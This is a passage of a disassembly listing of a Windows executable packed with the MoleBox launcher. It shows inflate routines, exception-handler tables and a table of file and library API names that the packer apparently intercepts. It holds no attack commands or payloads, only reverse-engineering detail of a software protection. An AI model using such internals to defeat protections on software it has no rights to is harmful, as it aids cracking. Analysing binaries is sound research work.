add [ebp+var_10], 4
loc_49E6FB: ; CODE XREF: sub_49E425+29D�j
mov ecx, [ebp+var_4]
mov eax, [ebp+var_C]
push 1
sub ecx, ebx
pop esi
shl esi, cl
mov ecx, ebx
shr eax, cl
cmp eax, [ebp+arg_0]
jnb short loc_49E72F
mov ecx, [ebp+var_1C]
lea ecx, [ecx+eax*8]
loc_49E717: ; CODE XREF: sub_49E425+306�j
mov edx, [ebp+var_28]
add eax, esi
mov [ecx], edx
mov edx, esi
shl edx, 3
mov [ecx+4], edi
add ecx, edx
cmp eax, [ebp+arg_0]
jb short loc_49E717
xor edx, edx
loc_49E72F: ; CODE XREF: sub_49E425+2EA�j
mov ecx, [ebp+var_2C]
push 1
pop eax
shl eax, cl
mov ecx, [ebp+var_C]
loc_49E73A: ; CODE XREF: sub_49E425+31D�j
test eax, ecx
jz short loc_49E744
xor ecx, eax
shr eax, 1
jmp short loc_49E73A
; ---------------------------------------------------------------------------
loc_49E744: ; CODE XREF: sub_49E425+317�j
xor ecx, eax
mov eax, [ebp+var_8]
mov [ebp+var_C], ecx
lea eax, [ebp+eax*4+var_B4]
loc_49E753: ; CODE XREF: sub_49E425+346�j
push 1
mov ecx, ebx
pop esi
shl esi, cl
dec esi
and esi, [ebp+var_C]
cmp esi, [eax]
jz short loc_49E76D
dec [ebp+var_8]
sub eax, 4
sub ebx, [ebp+arg_18]
jmp short loc_49E753
; ---------------------------------------------------------------------------
loc_49E76D: ; CODE XREF: sub_49E425+33B�j
mov eax, [ebp+var_14]
dec [ebp+var_14]
test eax, eax
jnz loc_49E5BA
loc_49E77B: ; CODE XREF: sub_49E425+18F�j
inc [ebp+var_4]
add [ebp+var_20], 4
mov eax, [ebp+var_4]
inc [ebp+var_2C]
cmp eax, [ebp+var_18]
jle loc_49E5A7
loc_49E791: ; CODE XREF: sub_49E425+16C�j
cmp [ebp+var_30], edx
jz loc_49E48A
cmp [ebp+var_18], 1
jz loc_49E48A
push 0FFFFFFFBh
loc_49E7A6: ; CODE XREF: sub_49E425+1F9�j
pop eax
jmp loc_49E48C
sub_49E425 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49E7AC proc near ; CODE XREF: sub_49CC4B+56C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, [ebp+arg_20]
push 4
push 120h
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [ebp+arg_20], eax
test eax, eax
jnz short loc_49E7D7
push 0FFFFFFFCh
pop eax
jmp loc_49E8AC
; ---------------------------------------------------------------------------
loc_49E7D7: ; CODE XREF: sub_49E7AC+21�j
push ebx
push edi
push eax
lea eax, [ebp+var_4]
push eax
mov ebx, [ebp+arg_0]
push [ebp+arg_1C]
mov edi, 101h
push [ebp+arg_C]
push [ebp+arg_14]
push offset dword_49F12C
push offset dword_49F0B0
push edi
push ebx
push [ebp+arg_8]
call sub_49E425
add esp, 28h
test eax, eax
jnz short loc_49E87E
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 0
jz short loc_49E891
push [ebp+arg_20]
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+arg_8]
push [ebp+arg_1C]
lea eax, [eax+ebx*4]
push [ebp+arg_10]
push [ebp+arg_18]
push offset dword_49F220
push offset dword_49F1A8
push 0
push [ebp+arg_4]
push eax
call sub_49E425
add esp, 28h
test eax, eax
jnz short loc_49E854
mov eax, [ebp+arg_10]
cmp dword ptr [eax], 0
jnz short loc_49E850
cmp ebx, edi
ja short loc_49E875
loc_49E850: ; CODE XREF: sub_49E7AC+9E�j
xor edi, edi
jmp short loc_49E89D
; ---------------------------------------------------------------------------
loc_49E854: ; CODE XREF: sub_49E7AC+96�j
cmp eax, 0FFFFFFFDh
jnz short loc_49E862
mov dword ptr [esi+18h], offset aOversubscrib_0 ; "oversubscribed distance tree"
jmp short loc_49E89B
; ---------------------------------------------------------------------------
loc_49E862: ; CODE XREF: sub_49E7AC+AB�j
cmp eax, 0FFFFFFFBh
jnz short loc_49E870
mov dword ptr [esi+18h], offset aIncompleteDist ; "incomplete distance tree"
jmp short loc_49E898
; ---------------------------------------------------------------------------
loc_49E870: ; CODE XREF: sub_49E7AC+B9�j
cmp eax, 0FFFFFFFCh
jz short loc_49E89B
loc_49E875: ; CODE XREF: sub_49E7AC+A2�j
mov dword ptr [esi+18h], offset aEmptyDistanceT ; "empty distance tree with lengths"
jmp short loc_49E898
; ---------------------------------------------------------------------------
loc_49E87E: ; CODE XREF: sub_49E7AC+5C�j
cmp eax, 0FFFFFFFDh
jnz short loc_49E88C
mov dword ptr [esi+18h], offset aOversubscrib_1 ; "oversubscribed literal/length tree"
jmp short loc_49E89B
; ---------------------------------------------------------------------------
loc_49E88C: ; CODE XREF: sub_49E7AC+D5�j
cmp eax, 0FFFFFFFCh
jz short loc_49E89B
loc_49E891: ; CODE XREF: sub_49E7AC+64�j
mov dword ptr [esi+18h], offset aIncompleteLite ; "incomplete literal/length tree"
loc_49E898: ; CODE XREF: sub_49E7AC+C2�j
; sub_49E7AC+D0�j
push 0FFFFFFFDh
pop eax
loc_49E89B: ; CODE XREF: sub_49E7AC+B4�j
; sub_49E7AC+C7�j ...
mov edi, eax
loc_49E89D: ; CODE XREF: sub_49E7AC+A6�j
push [ebp+arg_20]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov eax, edi
pop ecx
pop edi
pop ebx
loc_49E8AC: ; CODE XREF: sub_49E7AC+26�j
pop esi
leave
retn
sub_49E7AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49E8AF proc near ; CODE XREF: sub_49CC4B+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, ds:dword_4A0120
mov [eax], ecx
mov eax, [ebp+arg_4]
mov ecx, ds:dword_4A0124
mov [eax], ecx
mov eax, [ebp+arg_8]
mov dword ptr [eax], offset dword_4A0128
mov eax, [ebp+arg_C]
mov dword ptr [eax], offset dword_4A1128
xor eax, eax
pop ebp
retn
sub_49E8AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49E8DE proc near ; CODE XREF: sub_49CC4B+1F0�p
; sub_49CC4B+846�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov edx, [ebx+30h]
push edi
mov edi, [ebx+34h]
mov eax, [esi+0Ch]
cmp edx, edi
mov [ebp+var_8], eax
mov [ebp+arg_0], edx
jbe short loc_49E902
mov edi, [ebx+2Ch]
loc_49E902: ; CODE XREF: sub_49E8DE+1F�j
mov eax, [esi+10h]
sub edi, edx
cmp edi, eax
mov [ebp+var_4], edi
jbe short loc_49E913
mov [ebp+var_4], eax
mov edi, eax
loc_49E913: ; CODE XREF: sub_49E8DE+2E�j
test edi, edi
jz short loc_49E921
cmp [ebp+arg_8], 0FFFFFFFBh
jnz short loc_49E921
and [ebp+arg_8], 0
loc_49E921: ; CODE XREF: sub_49E8DE+37�j
; sub_49E8DE+3D�j
add [esi+14h], edi
sub eax, edi
mov [esi+10h], eax
mov eax, [ebx+38h]
test eax, eax
jz short loc_49E943
push edi
push edx
push dword ptr [ebx+3Ch]
call eax
mov edx, [ebp+arg_0]
mov [ebx+3Ch], eax
add esp, 0Ch
mov [esi+30h], eax
loc_49E943: ; CODE XREF: sub_49E8DE+50�j
mov ecx, edi
mov edi, [ebp+var_8]
mov eax, ecx
mov esi, edx
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+var_4]
add [ebp+var_8], eax
add [ebp+arg_0], eax
and ecx, 3
rep movsb
mov eax, [ebx+2Ch]
cmp [ebp+arg_0], eax
jnz short loc_49E9DC
mov edx, [ebx+28h]
cmp [ebx+34h], eax
mov [ebp+arg_0], edx
jnz short loc_49E977
mov [ebx+34h], edx
loc_49E977: ; CODE XREF: sub_49E8DE+94�j
mov esi, [ebp+arg_4]
mov edi, [ebx+34h]
sub edi, edx
mov eax, [esi+10h]
mov [ebp+var_4], edi
cmp edi, eax
jbe short loc_49E98E
mov [ebp+var_4], eax
mov edi, eax
loc_49E98E: ; CODE XREF: sub_49E8DE+A9�j
test edi, edi
jz short loc_49E99C
cmp [ebp+arg_8], 0FFFFFFFBh
jnz short loc_49E99C
and [ebp+arg_8], 0
loc_49E99C: ; CODE XREF: sub_49E8DE+B2�j
; sub_49E8DE+B8�j
add [esi+14h], edi
sub eax, edi
mov [esi+10h], eax
mov eax, [ebx+38h]
test eax, eax
jz short loc_49E9BE
push edi
push edx
push dword ptr [ebx+3Ch]
call eax
mov edx, [ebp+arg_0]
mov [ebx+3Ch], eax
add esp, 0Ch
mov [esi+30h], eax
loc_49E9BE: ; CODE XREF: sub_49E8DE+CB�j
mov ecx, edi
mov edi, [ebp+var_8]
mov eax, ecx
mov esi, edx
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+var_4]
add [ebp+var_8], eax
and ecx, 3
add [ebp+arg_0], eax
rep movsb
loc_49E9DC: ; CODE XREF: sub_49E8DE+89�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
pop edi
pop esi
mov [eax+0Ch], ecx
mov eax, [ebp+arg_0]
mov [ebx+30h], eax
mov eax, [ebp+arg_8]
pop ebx
leave
retn
sub_49E8DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49E9F3 proc near ; CODE XREF: sub_491C5C+32C�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
mov eax, [ebp+arg_8]
push esi
mov esi, [ebp+arg_4]
mov [ebp+var_38], eax
mov eax, [ebp+arg_C]
and [ebp+var_18], 0
mov [ebp+var_34], eax
mov eax, [ebp+arg_0]
and [ebp+var_14], 0
mov [ebp+var_2C], eax
mov eax, [esi]
push edi
mov [ebp+var_28], eax
push 38h
lea eax, [ebp+var_38]
push offset byte_4A00A8
push eax
call sub_49E02B
add esp, 0Ch
test eax, eax
jnz short loc_49EA6E
lea eax, [ebp+var_38]
push 4
push eax
call sub_49E043
mov edi, eax
pop ecx
cmp edi, 1
pop ecx
jz short loc_49EA5F
lea eax, [ebp+var_38]
push eax
call sub_49DF00
test edi, edi
pop ecx
jnz short loc_49EA5B
push 0FFFFFFFBh
pop eax
jmp short loc_49EA6E
; ---------------------------------------------------------------------------
loc_49EA5B: ; CODE XREF: sub_49E9F3+61�j
mov eax, edi
jmp short loc_49EA6E
; ---------------------------------------------------------------------------
loc_49EA5F: ; CODE XREF: sub_49E9F3+53�j
mov eax, [ebp+var_24]
mov [esi], eax
lea eax, [ebp+var_38]
push eax
call sub_49DF00
pop ecx
loc_49EA6E: ; CODE XREF: sub_49E9F3+3F�j
; sub_49E9F3+66�j ...
pop edi
pop esi
leave
retn
sub_49E9F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49EA72 proc near ; DATA XREF: sub_49DF41+41�o
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
imul eax, [ebp+arg_8]
push eax
call sub_49935A
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_49EA72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49EA8C proc near ; DATA XREF: sub_49DF41+50�o
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
call sub_4993DD
pop ecx
leave
retn
sub_49EA8C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49EAB0 proc near ; CODE XREF: sub_48EB8D+5�j
; _4:0048EB97�j
push ebp
mov ebp, esp
push offset aApiNopefunc ; ":API:NopeFunc"
call sub_4994F7
pop ebp
retn
sub_49EAB0 endp ; sp-analysis failed
_4 ends
; Section 6. (virtual address 0009F000)
; Virtual size : 00000D76 ( 3446.)
; Section size in file : 00000D76 ( 3446.)
; Offset to raw data for section: 0009F000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_5 segment para public 'CODE' use32
assume cs:_5
;org 49F000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dword_49F000 dd 77E79908h ; DATA XREF: sub_48E2E0+3AD�r
; sub_48E2E0+3B8�r ...
dword_49F004 dd 77E7A5FDh ; DATA XREF: sub_48E2E0+1D9�r
; sub_48E2E0+1ED�r ...
dword_49F008 dd 77E79A45h ; DATA XREF: sub_48E2E0+1A5�r
; sub_48E2E0+398�r ...
dword_49F00C dd 77E6D706h ; DATA XREF: sub_48E2E0+12B�r
; sub_48E2E0+173�r ...
dword_49F010 dd 77E79881h ; DATA XREF: sub_48E2E0+1A�r
; sub_48E2E0+108�r ...
dword_49F014 dd 77E79F93h ; DATA XREF: sub_48E2E0+A�r
; sub_48E2E0+1B0�r ...
dword_49F018 dd 77F7E300h ; DATA XREF: sub_48D060+4�r
; sub_49012B+15�r ...
dword_49F01C dd 77F7E21Fh ; DATA XREF: sub_48D000+2C�r
; sub_490036+65�r ...
dword_49F020 dd 77E6C10Bh ; DATA XREF: sub_493DD0+1A1�r
dword_49F024 dd 77E6E154h ; DATA XREF: sub_4981C3+114�r
dword_49F028 dd 77E61A90h ; DATA XREF: sub_498494+3A�r
; sub_498494+7C�r ...
dword_49F02C dd 77E62050h ; DATA XREF: sub_49BDDE+3F�r
dword_49F030 dd 77E641EBh ; DATA XREF: sub_48DDBF+59�r
; sub_48DDBF+8D�r
dword_49F034 dd 77E781F9h ; DATA XREF: sub_48DA80+42�r
; sub_48DA80+14D�r ...
dword_49F038 dd 77E77405h ; DATA XREF: sub_48DA80+5E�r
; sub_48DA80+A7�r
dword_49F03C dd 77F6183Eh ; DATA XREF: sub_48DF68�r
dword_49F040 dd 77E79924h ; DATA XREF: sub_48DA80+20D�r
dword_49F044 dd 77E77CCEh ; DATA XREF: sub_48DA80+DF�r
; sub_48DA80+137�r ...
dword_49F048 dd 77E7C866h ; DATA XREF: sub_48DDBF+3F�r
; sub_48DDBF+12D�r
align 10h
dword_49F050 dd 77D46F5Bh ; DATA XREF: sub_48D15E+AD�r
dword_49F054 dd 77D4B1B0h ; DATA XREF: sub_48D271+B8�r
align 10h
dword_49F060 dd 10h ; DATA XREF: sub_49CC4B+36F�r
; sub_49CC4B+3A0�r
dd 11h, 12h, 0
dd 8, 7, 9, 6, 0Ah, 5, 0Bh, 4, 0Ch, 3, 0Dh, 2, 0Eh, 1
dd 0Fh, 0FFFF0000h
dword_49F0B0 dd 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Dh, 0Fh, 11h, 13h, 17h
; DATA XREF: sub_49E7AC+48�o
dd 1Bh, 1Fh, 23h, 2Bh, 33h, 3Bh, 43h, 53h, 63h, 73h, 83h
dd 0A3h, 0C3h, 0E3h, 102h, 2 dup(0)
dword_49F12C dd 8 dup(0) ; DATA XREF: sub_49E7AC+43�o
dd 4 dup(1), 4 dup(2), 4 dup(3), 4 dup(4), 4 dup(5), 0
dd 2 dup(70h)
dword_49F1A8 dd 1, 2, 3, 4, 5, 7, 9, 0Dh, 11h, 19h, 21h, 31h, 41h, 61h
; DATA XREF: sub_49E7AC+81�o
dd 81h, 0C1h, 101h, 181h, 201h, 301h, 401h, 601h, 801h
dd 0C01h, 1001h, 1801h, 2001h, 3001h, 4001h, 6001h
dword_49F220 dd 4 dup(0) ; DATA XREF: sub_49E7AC+7C�o
dd 2 dup(1), 2 dup(2), 2 dup(3), 2 dup(4), 2 dup(5), 2 dup(6)
dd 2 dup(7), 2 dup(8), 2 dup(9), 2 dup(0Ah), 2 dup(0Bh)
dd 2 dup(0Ch), 2 dup(0Dh)
dword_49F298 dd 0FFFFFFFFh, 0 ; DATA XREF: _4:0048FBB5�o
dd offset sub_48FDE4
align 8
dd offset loc_48FDB2+2
dd offset loc_48FDBA
dword_49F2B0 dd 0FFFFFFFFh, 0 ; DATA XREF: _4:0048FE35�o
dd offset sub_49000C
align 10h
dword_49F2C0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_490036+5�o
dd offset sub_49012B
align 10h
dword_49F2D0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_490252+5�o
dd offset sub_49061F
align 10h
dword_49F2E0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_48D000+5�o
dd offset sub_48D05D
align 10h
dword_49F2F0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4906DE+5�o
; ---------------------------------------------------------------------------
jmp near ptr dword_4A3C04
; ---------------------------------------------------------------------------
align 10h
dword_49F300 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_490818+5�o
dd offset sub_49091D
align 10h
dword_49F310 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49094C+5�o
dd offset sub_490CA7
dd 2 dup(0)
dd offset sub_490A93
dword_49F328 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_490D24+5�o
dd offset loc_490E9E
align 8
dword_49F338 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_490ECD+5�o
dd offset loc_490F90
align 8
dword_49F348 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_490FBF+5�o
dd offset loc_4911D1
align 8
dword_49F358 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_491216+5�o
dd offset sub_491317
align 8
dword_49F368 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_491421+5�o
dd offset sub_491643
align 8
dword_49F378 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_491672+5�o
dd offset sub_491712
align 8
dword_49F388 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_491741+5�o
dd offset loc_491829
align 8
dword_49F398 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_491858+5�o
dd offset sub_491921
align 8
dword_49F3A8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_491950+5�o
dd offset sub_4919E1
align 8
dword_49F3B8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_491C5C+5�o
dd offset sub_491E9D
align 8
dword_49F3C8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_492177+5�o
dd offset sub_492441
align 8
dword_49F3D8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49253F+5�o
dd offset sub_4928B0
align 8
dword_49F3E8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4929D2+5�o
dd offset sub_492A8F
align 8
dword_49F3F8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_492CC4+5�o
dd offset sub_493194
align 8
dword_49F408 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_493DD0+5�o
dd offset sub_4945A2
align 8
dd offset loc_494354
dd offset loc_494385
dword_49F420 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_494610+5�o
dd offset sub_495427
align 10h
dword_49F430 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_495490+5�o
dd offset sub_49569C
align 10h
dword_49F440 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4956D0+5�o
dd offset sub_495791
align 10h
dword_49F450 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4957BF+5�o
dd offset sub_49587F
align 10h
dword_49F460 dd 0FFFFFFFFh, 496388h, 49639Bh, 0 ; DATA XREF: sub_4960D0+5�o
dd offset loc_496250
dd offset loc_496264
dword_49F478 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_496456+5�o
dd offset loc_4966BB
align 8
dword_49F488 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_496A41+5�o
dd offset sub_496AB3
align 8
dword_49F498 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_496BD7+5�o
dd offset nullsub_1
align 8
dd offset loc_496F3B
dd offset loc_496F44
dd 2 dup(0)
dd offset sub_496FCD
align 10h
dword_49F4C0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4971E1+5�o
dd offset sub_498085
align 10h
dd offset sub_497B7F
dd offset sub_497B88
dd 1, 0
dd offset sub_497B0E
align 8
dword_49F4E8 dd 0FFFFFFFFh, 4982E3h, 49831Dh ; DATA XREF: sub_4981C3+5�o
off_49F4F4 dd offset aMoleboxLaunche ; DATA XREF: sub_499401+13�r
; sub_499C27+252�r
; "MoleBox launcher fatal error"
off_49F4F8 dd offset aAssertionFai_0 ; DATA XREF: sub_490036+B6�r
; sub_49094C+BF�r ...
; "ASSERTION failed"
off_49F4FC dd offset aStripped ; DATA XREF: sub_490036+BE�r
; sub_49094C+C7�r ...
; "<stripped>"
dword_49F500 dd 0FFFFFFFFh, 499472h, 499476h, 0 ; DATA XREF: sub_499436+5�o
dword_49F510 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_499538+5�o
dd offset loc_4996FC
align 10h
dword_49F520 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_499726+5�o
dd offset sub_4997AB
align 10h
dword_49F530 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4997CA+5�o
dd offset sub_499864
align 10h
dword_49F540 dd 0FFFFFFFFh, 499BFBh, 499BFFh, 0 ; DATA XREF: sub_499A16+5�o
dword_49F550 dd 0FFFFFFFFh, 499FE0h, 499FE4h, 0 ; DATA XREF: sub_499EF3+5�o
dword_49F560 dd 0FFFFFFFFh, 49A22Ch, 49A230h, 0FFFFFFFFh, 49A2A5h, 49A2A9h
; DATA XREF: sub_49A18E+5�o
dword_49F578 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49A518+5�o
dd offset loc_49A615
align 8
dword_49F588 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49A638+5�o
dd offset sub_49A696
align 8
dword_49F598 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49A789+5�o
dd offset loc_49A89D
align 8
dword_49F5A8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49A8C0+5�o
dd offset loc_49A9A2
dword_49F5B4 dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0 ; DATA XREF: sub_49ADD4+FB�o
; sub_49ADD4+15F�o ...
dword_49F5C4 dd 33696467h, 6C642E32h, 6Ch ; DATA XREF: sub_49ADD4+10F�o
; sub_49C23E+5�o ...
dword_49F5D0 dd 72657375h, 642E3233h, 6C6Ch ; DATA XREF: sub_49ADD4+123�o
dword_49F5DC dd 33656C6Fh, 6C642E32h, 6Ch, 61766461h, 32336970h, 6C6C642Eh
; DATA XREF: sub_49A518+C2�o
; sub_49A789+6E�o ...
dd 0
dword_49F5F8 dd 61656C6Fh, 32337475h, 6C6C642Eh, 0 ; DATA XREF: sub_49A9C5+30�o
; sub_49AA34+6F�o ...
aSetunhandled_1 db 'SetUnhandledExceptionFilter',0 ; DATA XREF: _6:004A2254�o
aCreatefilea_1 db 'CreateFileA',0
aCreatefilew_0 db 'CreateFileW',0
aReadfile_1 db 'ReadFile',0
align 4
aClosehandle_1 db 'CloseHandle',0 ; DATA XREF: _6:004A228C�o
aSetfilepoint_1 db 'SetFilePointer',0 ; DATA XREF: _6:004A2294�o
align 4
aGetfilesize_1 db 'GetFileSize',0 ; DATA XREF: _6:004A229C�o
aExitprocess_1 db 'ExitProcess',0 ; DATA XREF: _6:004A22A4�o
aCreatefilema_2 db 'CreateFileMappingA',0 ; DATA XREF: _6:004A22AC�o
align 10h
aCreatefilema_3 db 'CreateFileMappingW',0 ; DATA XREF: _6:004A22B4�o
align 4
aLoadlibrarya_0 db 'LoadLibraryA',0 ; DATA XREF: _6:004A22D4�o
align 4
aLoadlibraryw db 'LoadLibraryW',0 ; DATA XREF: _6:004A22DC�o
align 4
aLoadlibrarye_0 db 'LoadLibraryExA',0 ; DATA XREF: _6:004A22E4�o
align 4
aLoadlibraryexw db 'LoadLibraryExW',0 ; DATA XREF: _6:004A22EC�o
align 4
aFreelibrary_0 db 'FreeLibrary',0 ; DATA XREF: _6:004A22CC�o
aGetprocaddre_0 db 'GetProcAddress',0 ; DATA XREF: _6:004A22F4�o
align 10h
aLoadimagea_0 db 'LoadImageA',0 ; DATA XREF: _6:004A23DC�o
align 4
aMapviewoffil_0 db 'MapViewOfFile',0 ; DATA XREF: _6:004A22BC�o
align 4
aUnmapviewoff_0 db 'UnmapViewOfFile',0 ; DATA XREF: _6:004A22C4�o
aGetfileattri_2 db 'GetFileAttributesA',0
align 10h
aGetfileattri_3 db 'GetFileAttributesW',0
align 4
aGetfileattri_4 db 'GetFileAttributesExW',0
align 4
aGetmodulehan_0 db 'GetModuleHandleA',0 ; DATA XREF: _6:004A2354�o
align 10h
aGetmodulehan_1 db 'GetModuleHandleW',0 ; DATA XREF: _6:004A235C�o
align 4
aGetmodulefil_0 db 'GetModuleFileNameA',0 ; DATA XREF: _6:004A23AC�o
align 4
aGetmodulefil_1 db 'GetModuleFileNameW',0 ; DATA XREF: _6:004A23B4�o
align 4
aGetlongpathn_1 db 'GetLongPathNameA',0 ; DATA XREF: _6:004A23BC�o
align 10h
aGetlongpathn_2 db 'GetLongPathNameW',0 ; DATA XREF: _6:004A23C4�o
align 4
aSearchpathw db 'SearchPathW',0 ; DATA XREF: sub_49B226+B2�o
; _6:004A2364�o
aSearchpatha_0 db 'SearchPathA',0 ; DATA XREF: sub_49B1C7+D�o
; _6:004A236C�o
aAddfontresou_0 db 'AddFontResourceA',0 ; DATA XREF: sub_49C23E+A�o
; _6:004A23CC�o
align 10h
aRemovefontre_0 db 'RemoveFontResourceA',0 ; DATA XREF: sub_49C277+A�o
; _6:004A23D4�o
aFindfirstfil_1 db 'FindFirstFileA',0 ; DATA XREF: _6:004A22FC�o
align 4
aFindfirstfilew db 'FindFirstFileW',0 ; DATA XREF: sub_49B361+92�o
; _6:004A2304�o
align 4
aFindclose_1 db 'FindClose',0 ; DATA XREF: _6:004A2314�o
align 10h
aFindnextfile_1 db 'FindNextFileA',0 ; DATA XREF: _6:004A231C�o
align 10h
aFindnextfilew db 'FindNextFileW',0 ; DATA XREF: sub_49B657+2E�o
; _6:004A2324�o
align 10h
aFindfirstfilee db 'FindFirstFileExW',0 ; DATA XREF: sub_49B4AA+92�o
; _6:004A230C�o
align 4
a_lopen db '_lopen',0 ; DATA XREF: sub_49C636+25�o
; _6:004A2334�o
align 4
aOpenfile db 'OpenFile',0 ; DATA XREF: sub_49C582+93�o
; _6:004A232C�o
align 4
a_lread db '_lread',0 ; DATA XREF: sub_49C711+27�o
; _6:004A2344�o
align 10h
a_llseek db '_llseek',0 ; DATA XREF: sub_49C6CC+20�o
; _6:004A234C�o
a_lclose db '_lclose',0 ; DATA XREF: sub_49C677+23�o
; _6:004A233C�o
aCocreateinstan db 'CoCreateInstance',0 ; DATA XREF: sub_49A518+C7�o
; _6:004A23E4�o
align 4
aCocreateinst_0 db 'CoCreateInstanceEx',0 ; DATA XREF: sub_49A789+73�o
; _6:004A23EC�o
align 4
aCogetclassobje db 'CoGetClassObject',0 ; DATA XREF: sub_49A8C0+AC�o
; _6:004A23F4�o
align 4
aGetprivatepr_2 db 'GetPrivateProfileStringA',0 ; DATA XREF: _6:004A2374�o
align 4
aGetprivatepr_3 db 'GetPrivateProfileIntA',0 ; DATA XREF: _6:004A237C�o
align 10h
aGetprivatepr_4 db 'GetPrivateProfileSectionNamesA',0 ; DATA XREF: _6:004A2384�o
align 10h
aGetprivatepr_5 db 'GetPrivateProfileSectionA',0 ; DATA XREF: _6:004A238C�o
align 4
aGetfileinfor_0 db 'GetFileInformationByHandle',0 ; DATA XREF: _6:004A2394�o
align 4
aLockfile_0 db 'LockFile',0 ; DATA XREF: _6:004A239C�o
align 4
aLockfileex db 'LockFileEx',0
align 10h
aUnlockfile_0 db 'UnlockFile',0 ; DATA XREF: _6:004A23A4�o
align 4
aUnlockfileex db 'UnlockFileEx',0
align 4
aGetrecordinf_0 db 'GetRecordInfoFromGuids',0 ; DATA XREF: sub_49AA34+D2�o
; _6:004A23FC�o
align 4
aGetrecordinfof db 'GetRecordInfoFromTypeInfo',0 ; DATA XREF: sub_49A9C5+35�o
align 10h
aLoadregtypelib db 'LoadRegTypeLib',0 ; DATA XREF: sub_49AB3C+84�o
; _6:004A2404�o
align 10h
aLoadtypelib db 'LoadTypeLib',0 ; DATA XREF: sub_49AA34+74�o
; sub_49AB3C+4F�o
align 10h
dword_49FA00 dd 0FFFFFFFFh, 49B115h, 49B119h, 0FFFFFFFFh, 49B129h, 49B12Dh
; DATA XREF: sub_49B0C8+5�o
dd 0FFFFFFFFh, 49B14Ah, 49B14Eh, 0FFFFFFFFh, 49B15Eh, 49B162h
dd 0FFFFFFFFh, 49B183h, 49B187h, 0FFFFFFFFh, 49B197h, 49B19Bh
dword_49FA48 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49B226+5�o
dd offset loc_49B311
align 8
